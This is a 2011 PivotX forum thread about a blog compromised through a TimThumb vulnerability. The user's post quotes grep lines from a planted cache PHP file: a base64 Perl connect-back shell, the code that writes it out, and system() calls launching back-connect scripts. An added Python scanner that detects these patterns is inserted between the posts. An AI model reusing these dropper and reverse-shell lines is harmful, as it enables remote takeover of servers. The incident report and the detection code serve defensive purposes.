Cache file perl execution causing site down

Post by Cranialstrain » Tue Oct 11, 2011 5:22 pm

Hi all,

All my sites went down about 5am this morning and after some digging by the hosting people they tracked it down to this, any ideas? We've since had to delete the contents of the cache directory to bring everything up but managed to capture this beforehand:

./blog.mysite.net/pivotx/db/cache/a24bcf2198b1b13ad985304483f7f324.php:$bcperl="IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZXJsLiBTaGFkb3cxMjAgLSB3
./blog.mysite.net/pivotx/db/cache/a24bcf2198b1b13ad985304483f7f324.php:fwrite($opbc,base64_decode($bcperl));
./blog.mysite.net/pivotx/db/cache/a24bcf2198b1b13ad985304483f7f324.php:system("perl bcc.pl $ipbc $pbc") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
./blog.mysite.net/pivotx/db/cache/a24bcf2198b1b13ad985304483f7f324.php:system("perl wbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
./blog.mysite.net/pivotx/db/cache/a24bcf2198b1b13ad985304483f7f324.php:system("perl lbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");

I have two PivotX sites and confess this one is running on 2.1 (not 2.3 like the other); I couldn't see anything in the change notes to explain this however.

Thanks!
Cranialstrain
 
Posts: 74
Joined: Tue Feb 26, 2008 9:10 am
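
An added example, not part of the original thread and not PivotX code: a small scanner that walks a cache directory and flags `.php` files containing the three patterns visible in the grep output above (a base64-encoded Perl script, `fwrite(..., base64_decode(...))`, and `system("perl ....pl")`). The function names, the sample file names and the benign file's content are assumptions constructed for the demonstration.

```python
import base64
import os
import re
import tempfile

# Indicators taken from the grep output quoted in the post above.
PERL_SHEBANG_B64 = base64.b64encode(b"#!/usr/bin/perl").decode()  # 15 bytes, so no padding
INDICATORS = {
    "b64_perl_script": re.compile(re.escape(PERL_SHEBANG_B64)),
    "fwrite_base64_decode": re.compile(r"fwrite\s*\(\s*\$\w+\s*,\s*base64_decode\s*\("),
    "system_runs_perl": re.compile(r"system\s*\(\s*[\"']perl\s+\S+\.pl\b"),
}

def scan_cache(cache_dir):
    """Return {relative_path: [indicator names]} for .php files that match."""
    findings = {}
    for root, _dirs, files in os.walk(cache_dir):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(root, name)
            # errors="replace" keeps the scan going on files with odd encodings.
            with open(path, "r", errors="replace") as fh:
                text = fh.read()
            hits = sorted(k for k, rx in INDICATORS.items() if rx.search(text))
            if hits:
                findings[os.path.relpath(path, cache_dir)] = hits
    return findings

def demo():
    """Build a constructed cache directory and scan it."""
    with tempfile.TemporaryDirectory() as d:
        # Constructed sample: inert fragments mirroring the quoted grep lines.
        with open(os.path.join(d, "a24bcf.php"), "w") as fh:
            fh.write('<?php $bcperl="' + PERL_SHEBANG_B64 + '";\n'
                     'fwrite($opbc,base64_decode($bcperl));\n'
                     'system("perl bcc.pl $ipbc $pbc");\n')
        # Constructed benign cache entry (hypothetical content).
        with open(os.path.join(d, "thumb.php"), "w") as fh:
            fh.write("<?php /* cached thumbnail metadata */ ?>\n")
        return scan_cache(d)

if __name__ == "__main__":
    for path, hits in demo().items():
        print(path, hits)
```

Point `scan_cache` at a copy of `pivotx/db/cache` before clearing it, so the matching files can be preserved as evidence.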

Re: Cache file perl execution causing site down

Post by Bob » Tue Oct 11, 2011 6:39 pm

Upgrade your PivotX. This is a vulnerability in Timthumb.php, that has been fixed in 2.3.0.

There will be a 2.3.1 update very soon, but you should replace timthumb.php in pivotx/includes right now. Get this file, unzip it, and replace it on your server: http://pivotx.net/files/misc/timthumb_2011-10-11.zip
Bob
Lead Developer
 
Posts: 1374
Joined: Tue Nov 20, 2007 11:16 pm

Re: Cache file perl execution causing site down

Post by Cranialstrain » Tue Oct 11, 2011 9:17 pm

Thanks Bob, as always the PivotX community and support astounds me :-)

Best wishes, Ian.
Cranialstrain
 
Posts: 74
Joined: Tue Feb 26, 2008 9:10 am

Re: Cache file perl execution causing site down

Post by Bob » Wed Oct 12, 2011 1:16 pm

Hi,

I accidentally linked you to a broken version of timthumb.php yesterday. You should use this one:
http://pivotx.net/files/misc/timthumb_2011-10-12.zip

(or upgrade to 2.3.1, released later today)
Bob
Lead Developer
 
Posts: 1374
Joined: Tue Nov 20, 2007 11:16 pm
